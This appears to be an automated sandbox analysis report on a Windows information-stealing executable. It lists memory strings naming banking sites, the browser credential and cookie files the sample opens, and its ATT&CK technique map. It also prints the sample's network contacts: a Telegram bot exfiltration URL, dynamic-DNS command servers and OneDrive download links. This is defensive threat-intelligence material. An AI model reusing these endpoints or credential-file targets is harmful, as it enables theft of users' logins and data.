            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595000Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 594890Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 594781Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 594671Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 594562Jump to behavior
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: ________.exe, 00000003.00000002.3954718526.00000000025B8000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3954718526.000000000260E000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3954718526.00000000025F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: C:\Users\user\Desktop\________.exeAPI call chain: ExitProcess graph end nodegraph_1-4789
            Source: C:\Users\user\Desktop\________.exeAPI call chain: ExitProcess graph end nodegraph_1-4791
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00406254
            Source: C:\Users\user\Desktop\________.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\________.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\________.exeProcess created: C:\Users\user\Desktop\________.exe "C:\Users\user\Desktop\________.exe"Jump to behavior
            Source: C:\Users\user\Desktop\________.exeQueries volume information: C:\Users\user\Desktop\________.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\________.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\________.exeCode function: 1_2_00405F0C GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,1_2_00405F0C
            Source: C:\Users\user\Desktop\________.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ________.exe PID: 5916, type: MEMORYSTR
            Source: C:\Users\user\Desktop\________.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\________.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\________.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\________.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\________.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\________.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\________.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\________.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\________.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\________.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ________.exe PID: 5916, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ________.exe PID: 5916, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            11
            Process Injection
            11
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging3
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input Capture24
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            ________.exe8%VirustotalBrowse
            ________.exe100%AviraHEUR/AGEN.1331786
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            foodex.com.pk0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://mail.foodex.com.pk0%Avira URL Cloudsafe
            https://fa2ytg.dm.files.1drv.com/0%Avira URL Cloudsafe
            http://foodex.com.pk0%Avira URL Cloudsafe
            https://fa2ytg.dm.files.1drv.com/oft0%Avira URL Cloudsafe
            https://fa2ytg.dm.files.1drv.com/y4m_K24I_IZwtc1os-c0UOoxdtzKrradsOM2iRZNEMhYqB_oUmwpewHC2hedgX3rXjZ0%Avira URL Cloudsafe
            https://fa2ytg.dm.files.1drv.com/y4mMPMXGbTpZA5YgHaTE31Fc-Wg6Iu9gpthjDJlQ5ie3dz395ZMCu5rd38cOpuGMXl40%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            reallyfreegeoip.org
            188.114.96.3
            truefalse
              high
              foodex.com.pk
              37.27.123.72
              truetrueunknown
              api.telegram.org
              149.154.167.220
              truefalse
                high
                checkip.dyndns.com
                193.122.130.0
                truefalse
                  high
                  fa2ytg.dm.files.1drv.com
                  unknown
                  unknowntrue
                    unknown
                    mail.foodex.com.pk
                    unknown
                    unknowntrue
                      unknown
                      api.onedrive.com
                      unknown
                      unknownfalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/173.254.250.68false
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20and%20Time:%2012/11/2024%20/%2018:46:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20141700%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              http://checkip.dyndns.org/false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/________.exe, 00000003.00000002.3975771250.0000000032F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/chrome_newtab________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://reallyfreegeoip.org/xml/173.254.250.68$________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032DDC000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032E1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://sectigo.com/CPS0________.exefalse
                                          high
                                          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#________.exefalse
                                            high
                                            https://api.telegram.org________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.ico________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://ocsp.sectigo.com0________.exefalse
                                                  high
                                                  https://api.telegram.org/bot________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://mail.foodex.com.pk________.exe, 00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032EFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://api.onedrive.com/________.exe, 00000003.00000002.3954718526.00000000025B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.office.com/lB________.exe, 00000003.00000002.3975771250.0000000032F4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://checkip.dyndns.org________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://nsis.sf.net/NSIS_ErrorError________.exefalse
                                                                high
                                                                https://fa2ytg.dm.files.1drv.com/oft________.exe, 00000003.00000003.1735612317.0000000002628000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://chrome.google.com/webstore?hl=en________.exe, 00000003.00000002.3975771250.0000000032F20000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.ecosia.org/newtab/________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://foodex.com.pk________.exe, 00000003.00000002.3975771250.0000000032EFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://varders.kozow.com:8081________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://aborters.duckdns.org:8081________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ac.ecosia.org/autocomplete?q=________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0________.exefalse
                                                                              high
                                                                              https://fa2ytg.dm.files.1drv.com/________.exe, 00000003.00000003.1709008650.0000000002628000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.office.com/8ub________.exe, 00000003.00000002.3975771250.0000000032F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://51.38.247.67:8081/_send_.php?L________.exe, 00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20a________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://anotherarmy.dns.army:8081________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.onedrive.com/v1.0/shares/s________.exe, 00000003.00000002.3954718526.00000000025F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z________.exefalse
                                                                                          high
                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://fa2ytg.dm.files.1drv.com/y4mMPMXGbTpZA5YgHaTE31Fc-Wg6Iu9gpthjDJlQ5ie3dz395ZMCu5rd38cOpuGMXl4________.exe, 00000003.00000003.1735612317.0000000002628000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://chrome.google.com/webstore?hl=enlB________.exe, 00000003.00000002.3975771250.0000000032F1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://reallyfreegeoip.org________.exe, 00000003.00000002.3975771250.0000000032E49000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032DAE000.00000004.00000800.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3975771250.0000000032E1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=________.exe, 00000003.00000002.3976863799.0000000033D81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://fa2ytg.dm.files.1drv.com/y4m_K24I_IZwtc1os-c0UOoxdtzKrradsOM2iRZNEMhYqB_oUmwpewHC2hedgX3rXjZ________.exe, 00000003.00000003.1735530271.0000000002628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#________.exefalse
                                                                                                      high
                                                                                                      https://reallyfreegeoip.org/xml/________.exe, 00000003.00000002.3975771250.0000000032DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs
                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        149.154.167.220
                                                                                                        api.telegram.orgUnited Kingdom
                                                                                                        62041TELEGRAMRUfalse
                                                                                                        188.114.97.3
                                                                                                        unknownEuropean Union
                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                        188.114.96.3
                                                                                                        reallyfreegeoip.orgEuropean Union
                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                        193.122.130.0
                                                                                                        checkip.dyndns.comUnited States
                                                                                                        31898ORACLE-BMC-31898USfalse
                                                                                                        37.27.123.72
                                                                                                        foodex.com.pkIran (ISLAMIC Republic Of)
                                                                                                        39232UNINETAZtrue
                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1554160
                                                                                                        Start date and time:2024-11-12 07:35:12 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 9m 28s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:9
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
